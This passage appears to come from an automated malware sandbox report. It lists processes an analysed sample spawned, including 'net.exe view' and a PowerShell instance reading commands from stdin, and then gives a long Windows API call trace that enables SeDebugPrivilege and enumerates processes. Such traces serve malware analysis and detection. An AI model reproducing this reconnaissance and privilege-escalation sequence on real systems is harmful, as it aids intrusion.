This=0x320a788, riid=0x73ae5e8c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x937fc58 | out: ppvObject=0x937fc58*=0x320a794) returned 0x0 [0218.638] IComThreadingInfo:GetCurrentThreadType (in: This=0x320a794, pThreadType=0x937fc84 | out: pThreadType=0x937fc84*=0) returned 0x0 [0218.639] IUnknown:Release (This=0x320a794) returned 0x0 [0218.639] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0218.639] RoInitialize () returned 0x1 [0218.639] RoUninitialize () returned 0x0 [0218.639] SleepEx (dwMilliseconds=0xffffffff, bAlertable=1) returned 0xc0 [0218.644] SleepEx (dwMilliseconds=0x2710, bAlertable=1) returned 0x0 [0228.677] SleepEx (dwMilliseconds=0xffffffff, bAlertable=1) Thread: id = 49 os_tid = 0x4f4 Thread: id = 50 os_tid = 0xa28 Thread: id = 51 os_tid = 0xd0c Process: id = "3" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x16bca000" os_pid = "0x10a0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x1064" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 8 os_tid = 0x108c Thread: id = 9 os_tid = 0x4b4 Thread: id = 10 os_tid = 0xd6c Thread: id = 13 os_tid = 0x6dc Thread: id = 14 os_tid = 0x10ec Thread: id = 27 os_tid = 0xf9c Thread: id = 28 os_tid = 0xeac Process: id = "4" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x23f86000" os_pid = "0x130c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x1064" cmd_line = "\"C:\\WINDOWS\\system32\\net.exe\" view" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 46 os_tid = 0x1314 Thread: id = 47 os_tid = 0x1310 Process: id = "5" image_name = "powershell.exe" filename = "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe" page_root = "0xa335000" os_pid = "0x13b8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x13d0" cmd_line = "powershell.exe -NoExit -Command -" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 52 os_tid = 0x13bc [0238.068] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0238.071] RoInitialize () returned 0x1 [0238.071] RoUninitialize () returned 0x0 [0238.246] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0238.246] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0238.870] SysStringByteLen (bstr="-NoExit") returned 0xe [0238.870] SysStringByteLen (bstr="-NoExit") returned 0xe [0238.870] SysStringByteLen (bstr="-Command") returned 0x10 [0238.870] SysStringByteLen (bstr="-Command") returned 0x10 [0238.870] SysStringByteLen (bstr="-") returned 0x2 [0238.870] SysStringByteLen (bstr="-") returned 0x2 [0239.246] WindowsCreateStringReference () returned 0x0 [0239.246] RoGetActivationFactory () returned 0x0 [0239.255] QueryInterface () returned 0x0 [0239.256] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x80004002 [0239.256] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x80004002 [0239.256] QueryInterface () returned 0x0 [0239.256] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::GetRuntimeClassName () returned 0x8000000e [0239.256] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::Release () returned 0x3 [0239.256] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::AddRef () returned 0x4 [0239.256] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x80004002 [0239.256] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x0 [0239.256] Release () returned 0x4 [0239.257] CoGetContextToken (in: pToken=0x59d730 | out: pToken=0x59d730) returned 0x0 [0239.257] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x80004002 [0239.257] CoGetContextToken (in: pToken=0x59da40 | out: pToken=0x59da40) returned 0x0 [0239.257] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x0 [0239.257] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::Release () returned 0x4 [0239.257] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::Release () returned 0x3 [0239.257] WindowsDeleteString () returned 0x0 [0239.258] Release () returned 0x2 [0239.258] CoGetContextToken (in: pToken=0x59e1b8 | out: pToken=0x59e1b8) returned 0x0 [0239.258] CoGetContextToken (in: pToken=0x59e118 | out: pToken=0x59e118) returned 0x0 [0239.258] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x0 [0239.258] AddRef () returned 0x4 [0239.258] Release () returned 0x3 [0239.281] IIDFromString (in: lpsz="{410B7711-FF3B-477F-9C9A-D2EFDA302DC3}", lpiid=0x59d850 | out: lpiid=0x59d850) returned 0x0 [0239.282] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::add_TracingStatusChanged () returned 0x0 [0239.386] GenericStreamBase::Write () returned 0x0 [0239.386] GenericStreamBase::Write () returned 0x0 [0239.388] CoCreateGuid (in: pguid=0x740947a8 | out: pguid=0x740947a8*(Data1=0xb10408fc, Data2=0xe4c1, Data3=0x448e, Data4=([0]=0xb5, [1]=0x57, [2]=0x21, [3]=0xdb, [4]=0x7c, [5]=0x1f, [6]=0x2d, [7]=0xa4))) returned 0x0 [0239.388] GenericStreamBase::Write () returned 0x0 [0239.389] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::QueryInterface () returned 0x0 [0239.389] CExtensionCatalog::AddRef () returned 0x3 [0239.389] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::QueryInterface () returned 0x80004002 [0239.389] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::QueryInterface () returned 0x0 [0239.389] Release () returned 0x3 [0239.389] CoGetContextToken (in: pToken=0x59d608 | out: pToken=0x59d608) returned 0x0 [0239.390] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::QueryInterface () returned 0x80004002 [0239.395] WindowsCreateString () returned 0x0 [0239.395] CExtensionCatalog::AddRef () returned 0x4 [0239.395] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::Release () returned 0x3 [0239.397] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::get_Enabled () returned 0x0 [0239.428] EtwEventRegister (in: ProviderId=0x4935b54, EnableCallback=0x4532bc6, CallbackContext=0x0, RegHandle=0x4935b30 | out: RegHandle=0x4935b30) returned 0x0 [0239.434] EtwEventRegister (in: ProviderId=0x4936258, EnableCallback=0x4532bee, CallbackContext=0x0, RegHandle=0x4936234 | out: RegHandle=0x4936234) returned 0x0 [0239.434] EtwEventSetInformation (RegHandle=0x818ed0, InformationClass=0x2d, EventInformation=0x2, InformationLength=0x49361f8) returned 0x0 [0239.462] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x59eb44*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x59eb44*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0 [0239.465] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x59eb44*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x59eb44*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x4, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0239.466] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x59eaf4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x59eaf4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0 [0239.470] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x59eb54*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x4, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x59eb54*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x4, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0239.479] EtwEventRegister (in: ProviderId=0x4936668, EnableCallback=0x4532c16, CallbackContext=0x0, RegHandle=0x4936640 | out: RegHandle=0x4936640) returned 0x0 [0239.483] EtwEventWriteTransfer (RegHandle=0x818fa8, EventDescriptor=0x2e, ActivityId=0x59eb68, RelatedActivityId=0x59eb14, UserDataCount=0x0, UserData=0x0) returned 0x0 [0239.493] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\AppContext", ulOptions=0x0, samDesired=0x20019, phkResult=0x59e2d0 | out: phkResult=0x59e2d0*=0x0) returned 0x2 [0239.495] RegCloseKey (hKey=0x80000002) returned 0x0 [0239.507] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x104, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87 [0239.514] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x88 [0239.514] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x88, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87 [0239.516] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x59ea18) returned 1 [0239.516] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.management.automation\\v4.0_3.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x59ea94 | out: lpFileInformation=0x59ea94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71ce8766, ftCreationTime.dwHighDateTime=0x1d32794, ftLastAccessTime.dwLowDateTime=0x71ce8766, ftLastAccessTime.dwHighDateTime=0x1d32794, ftLastWriteTime.dwLowDateTime=0x71d0e9d1, ftLastWriteTime.dwHighDateTime=0x1d32794, nFileSizeHigh=0x0, nFileSizeLow=0x623400)) returned 1 [0239.516] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x59ea14) returned 1 [0239.518] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x59eb08 | out: lpdwHandle=0x59eb08) returned 0x94c [0239.521] GetFileVersionInfoW (in: lptstrFilename="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x49373c0 | out: lpData=0x49373c0) returned 1 [0239.523] VerQueryValueW (in: pBlock=0x49373c0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x59eadc, puLen=0x59ead8 | out: lplpBuffer=0x59eadc*=0x493745c, puLen=0x59ead8) returned 1 [0239.530] VerQueryValueW (in: pBlock=0x49373c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x59ea5c, puLen=0x59ea58 | out: lplpBuffer=0x59ea5c*=0x4937538, puLen=0x59ea58) returned 1 [0239.531] VerQueryValueW (in: pBlock=0x49373c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x59ea5c, puLen=0x59ea58 | out: lplpBuffer=0x59ea5c*=0x493758c, puLen=0x59ea58) returned 1 [0239.531] VerQueryValueW (in: pBlock=0x49373c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x59ea5c, puLen=0x59ea58 | out: lplpBuffer=0x59ea5c*=0x49375e8, puLen=0x59ea58) returned 1 [0239.531] VerQueryValueW (in: pBlock=0x49373c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x59ea5c, puLen=0x59ea58 | out: lplpBuffer=0x59ea5c*=0x4937628, puLen=0x59ea58) returned 1 [0239.531] VerQueryValueW (in: pBlock=0x49373c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x59ea5c, puLen=0x59ea58 | out: lplpBuffer=0x59ea5c*=0x4937690, puLen=0x59ea58) returned 1 [0239.531] VerQueryValueW (in: pBlock=0x49373c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x59ea5c, puLen=0x59ea58 | out: lplpBuffer=0x59ea5c*=0x493772c, puLen=0x59ea58) returned 1 [0239.531] VerQueryValueW (in: pBlock=0x49373c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x59ea5c, puLen=0x59ea58 | out: lplpBuffer=0x59ea5c*=0x4937790, puLen=0x59ea58) returned 1 [0239.531] VerQueryValueW (in: pBlock=0x49373c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x59ea5c, puLen=0x59ea58 | out: lplpBuffer=0x59ea5c*=0x493780c, puLen=0x59ea58) returned 1 [0239.531] VerQueryValueW (in: pBlock=0x49373c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x59ea5c, puLen=0x59ea58 | out: lplpBuffer=0x59ea5c*=0x49374b4, puLen=0x59ea58) returned 1 [0239.531] VerQueryValueW (in: pBlock=0x49373c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x59ea5c, puLen=0x59ea58 | out: lplpBuffer=0x59ea5c*=0x0, puLen=0x59ea58) returned 0 [0239.531] VerQueryValueW (in: pBlock=0x49373c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x59ea5c, puLen=0x59ea58 | out: lplpBuffer=0x59ea5c*=0x0, puLen=0x59ea58) returned 0 [0239.531] VerQueryValueW (in: pBlock=0x49373c0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x59ea5c, puLen=0x59ea58 | out: lplpBuffer=0x59ea5c*=0x0, puLen=0x59ea58) returned 0 [0239.531] VerQueryValueW (in: pBlock=0x49373c0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x59ea50, puLen=0x59ea4c | out: lplpBuffer=0x59ea50*=0x493745c, puLen=0x59ea4c) returned 1 [0239.532] VerLanguageNameW (in: wLang=0x0, szLang=0x59e7e0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0239.567] VerQueryValueW (in: pBlock=0x49373c0, lpSubBlock="\\", lplpBuffer=0x59ea60, puLen=0x59ea5c | out: lplpBuffer=0x59ea60*=0x49373e8, puLen=0x59ea5c) returned 1 [0239.570] GetCurrentProcessId () returned 0x13b8 [0239.572] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x59e324 | out: lpLuid=0x59e324*(LowPart=0x14, HighPart=0)) returned 1 [0239.574] GetCurrentProcess () returned 0xffffffff [0239.574] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x59e320 | out: TokenHandle=0x59e320*=0x350) returned 1 [0239.574] AdjustTokenPrivileges (in: TokenHandle=0x350, DisableAllPrivileges=0, NewState=0x4939f30*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0239.575] CloseHandle (hObject=0x350) returned 1 [0239.577] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x13b8) returned 0x350 [0239.587] EnumProcessModules (in: hProcess=0x350, lphModule=0x4939f74, cb=0x100, lpcbNeeded=0x59ea90 | out: lphModule=0x4939f74, lpcbNeeded=0x59ea90) returned 1 [0239.589] GetModuleInformation (in: hProcess=0x350, hModule=0x1020000, lpmodinfo=0x493a0b4, cb=0xc | out: lpmodinfo=0x493a0b4*(lpBaseOfDll=0x1020000, SizeOfImage=0x6c000, EntryPoint=0x10295f0)) returned 1 [0239.590] CoTaskMemAlloc (cb=0x804) returned 0x87a310 [0239.590] GetModuleBaseNameW (in: hProcess=0x350, hModule=0x1020000, lpBaseName=0x87a310, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0239.591] CoTaskMemFree (pv=0x87a310) [0239.591] CoTaskMemAlloc (cb=0x804) returned 0x87a310 [0239.591] GetModuleFileNameExW (in: hProcess=0x350, hModule=0x1020000, lpFilename=0x87a310, nSize=0x800 | out: lpFilename="C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0239.591] CoTaskMemFree (pv=0x87a310) [0239.592] CloseHandle (hObject=0x350) returned 1 [0239.593] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x13b8) returned 0x350 [0239.594] GetExitCodeProcess (in: hProcess=0x350, lpExitCode=0x4939698 | out: lpExitCode=0x4939698*=0x103) returned 1 [0239.659] EnumWindows (lpEnumFunc=0x4532c3e, lParam=0x0) returned 0 [0239.660] GetWindowThreadProcessId (in: hWnd=0x10158, lpdwProcessId=0x59e9f4 | out: lpdwProcessId=0x59e9f4) returned 0xae8 [0239.660] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0x59e9f4 | out: lpdwProcessId=0x59e9f4) returned 0x940 [0239.660] GetWindowThreadProcessId (in: hWnd=0x100cc, lpdwProcessId=0x59e9f4 | out: lpdwProcessId=0x59e9f4) returned 0x80c [0239.661] GetWindowThreadProcessId (in: hWnd=0x100c8, lpdwProcessId=0x59e9f4 | out: lpdwProcessId=0x59e9f4) returned 0x80c [0239.661] GetWindowThreadProcessId (in: hWnd=0x100c4, lpdwProcessId=0x59e9f4 | out: lpdwProcessId=0x59e9f4) returned 0x80c [0239.661] GetWindowThreadProcessId (in: hWnd=0x100c0, lpdwProcessId=0x59e9f4 | out: lpdwProcessId=0x59e9f4) returned 0x80c [0239.661] GetWindowThreadProcessId (in: hWnd=0x100ac, lpdwProcessId=0x59e9f4 | out: lpdwProcessId=0x59e9f4) returned 0x80c [0239.661] GetWindowThreadProcessId (in: hWnd=0x100a4, lpdwProcessId=0x59e9f4 | out: lpdwProcessId=0x59e9f4) returned 0x80c [0239.661] GetWindowThreadProcessId (in: hWnd=0x10098, lpdwProcessId=0x59e9f4 | out: lpdwProcessId=0x59e9f4) returned 0x80c [0239.661] GetWindowThreadProcessId (in: hWnd=0x100dc, lpdwProcessId=0x59e9f4 | out: lpdwProcessId=0x59e9f4) returned 0x80c [0239.661] GetWindowThreadProcessId (in: hWnd=0x100d0, lpdwProcessId=0x59e9f4 | out: lpdwProcessId=0x59e9f4) returned 0x80c [0239.662] GetWindowThreadProcessId (in: hWnd=0x100d4, lpdwProcessId=0x59e9f4 | out: lpdwProcessId=0x59e9f4) returned 0x80c [0239.662] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x59e9f4 | out: lpdwProcessId=0x59e9f4) returned 0x80c [0239.662] GetWindowThreadProcessId (in: hWnd=0x101d8, lpdwProcessId=0x59e9f4 | out: lpdwProcessId=0x59e9f4) returned 0xc9c [0239.662] GetWindowThreadProcessId (in: hWnd=0x10100, lpdwProcessId=0x59e9f4 | out: lpdwProcessId=0x59e9f4) returned 0x5cc [0239.662] GetWindowThreadProcessId (in: hWnd=0x100de, lpdwProcessId=0x59e9f4 | out: lpdwProcessId=0x59e9f4) returned 0x80c [0239.662] GetWindowThreadProcessId (in: hWnd=0x302b8, lpdwProcessId=0x59e9f4 | out: lpdwProcessId=0x59e9f4) returned 0x13bc [0239.663] GetWindow (hWnd=0x302b8, uCmd=0x4) returned 0x0 [0239.663] IsWindowVisible (hWnd=0x302b8) returned 1 [0239.670] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x59394c8, Length=0x20000, ResultLength=0x59eab4 | out: SystemInformation=0x59394c8, ResultLength=0x59eab4*=0x22228) returned 0xc0000004 [0239.676] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x59594e8, Length=0x24a28, ResultLength=0x59eab4 | out: SystemInformation=0x59594e8, ResultLength=0x59eab4*=0x18cf8) returned 0x0 [0239.693] WerSetFlags () returned 0x0 [0239.695] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1 [0239.734] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x59eae0, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x59eadc | out: pulNumLanguages=0x59eae0, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x59eadc) returned 1 [0239.734] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x59eae0, pwszLanguagesBuffer=0x4966828, pcchLanguagesBuffer=0x59eadc | out: pulNumLanguages=0x59eae0, pwszLanguagesBuffer=0x4966828, pcchLanguagesBuffer=0x59eadc) returned 1 [0239.740] GetUserDefaultLocaleName (in: lpLocaleName=0x59ea74, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6 [0239.758] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x59e224, nSize=0x80 | out: lpBuffer="￿￿Yဢ玤㦀牥皴犞佚玭נּ㟎㒘\x84皴犞㦀牥胰犉㦀牥胰犉Y啾玭￿￿Y꛰珺￿￿佚玭刐玭䪌犨") returned 0x0 [0239.759] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x59e224, nSize=0x80 | out: lpBuffer="￿￿腬\x86Yᩚ玺⏸\x82\x01⌀") returned 0x0 [0239.818] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x105, lpBuffer=0x59da30, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40 [0239.819] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x59deec) returned 1 [0239.819] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x59df68 | out: lpFileInformation=0x59df68*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0239.819] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x59dee8) returned 1 [0240.381] CoCreateGuid (in: pguid=0x59e194 | out: pguid=0x59e194*(Data1=0xd99241, Data2=0x54be, Data3=0x4c05, Data4=([0]=0xab, [1]=0xd7, [2]=0x3, [3]=0x56, [4]=0xff, [5]=0xdb, [6]=0xc2, [7]=0x96))) returned 0x0 [0240.402] CoCreateGuid (in: pguid=0x59e188 | out: pguid=0x59e188*(Data1=0xcd0843bd, Data2=0xb0e3, Data3=0x4dba, Data4=([0]=0x82, [1]=0xce, [2]=0x59, [3]=0xfb, [4]=0x11, [5]=0x42, [6]=0xae, [7]=0xd8))) returned 0x0 [0240.402] CoCreateGuid (in: pguid=0x59e188 | out: pguid=0x59e188*(Data1=0x281d8754, Data2=0x3267, Data3=0x44a3, Data4=([0]=0x94, [1]=0x1a, [2]=0x10, [3]=0xb1, [4]=0xc9, [5]=0xfb, [6]=0x26, [7]=0x26))) returned 0x0 [0240.402] CoCreateGuid (in: pguid=0x59e188 | out: pguid=0x59e188*(Data1=0x1110f0be, Data2=0x211c, Data3=0x4ab0, Data4=([0]=0x90, [1]=0x3a, [2]=0x1c, [3]=0xf6, [4]=0x8c, [5]=0xfc, [6]=0x8, [7]=0xb0))) returned 0x0 [0240.402] CoCreateGuid (in: pguid=0x59e188 | out: pguid=0x59e188*(Data1=0xacdb5429, Data2=0xbd94, Data3=0x4a77, Data4=([0]=0xa3, [1]=0xa1, [2]=0xd5, [3]=0xf8, [4]=0xdb, [5]=0x52, [6]=0x83, [7]=0xa0))) returned 0x0 [0240.403] CoCreateGuid (in: pguid=0x59e188 | out: pguid=0x59e188*(Data1=0x27f7ef20, Data2=0x8b54, Data3=0x476b, Data4=([0]=0xbd, [1]=0x64, [2]=0x3c, [3]=0x2d, [4]=0xde, [5]=0xe1, [6]=0xb9, [7]=0x74))) returned 0x0 [0240.403] CoCreateGuid (in: pguid=0x59e188 | out: pguid=0x59e188*(Data1=0x1bd6be0, Data2=0xfb89, Data3=0x494a, Data4=([0]=0xae, [1]=0xa7, [2]=0x9c, [3]=0x31, [4]=0xd7, [5]=0xef, [6]=0xb2, [7]=0xa2))) returned 0x0 [0240.403] CoCreateGuid (in: pguid=0x59e188 | out: 